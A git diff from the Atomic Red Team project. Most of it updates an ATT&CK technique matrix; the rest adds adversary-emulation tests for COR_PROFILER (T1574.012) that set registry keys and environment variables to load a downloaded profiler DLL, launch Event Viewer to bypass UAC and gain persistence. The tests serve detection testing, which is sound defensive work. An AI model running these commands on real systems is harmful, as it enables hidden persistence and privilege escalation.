-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | [Service Execution](../../T1569.002/T1569.002.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
+|  | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -9,15 +9,15 @@
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -1538,7 +1538,132 @@ privilege-escalation:
      - Jesse Brown, Red Canary
      x_mitre_platforms:
      - Windows
-    atomic_tests: []
+      identifier: T1574.012
+    atomic_tests:
+    - name: User scope COR_PROFILER
+      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
+      description: |
+        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
+        The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
+        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
+        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
+        the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
+          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
+          START MMC.EXE EVENTVWR.MSC
+        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
+          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
+          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
+          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
+          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
+          -Force -ErrorAction Ignore | Out-Null\n"
+        name: powershell
+    - name: System Scope COR_PROFILER
+      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
+      description: |
+        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
+        The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
+        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating system environment variables" -ForegroundColor Cyan
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+        cleanup_command: |
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
+        name: powershell
+        elevation_required: true
+    - name: Registry-free process scope COR_PROFILER
+      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
+      description: |
+        Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unamanged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
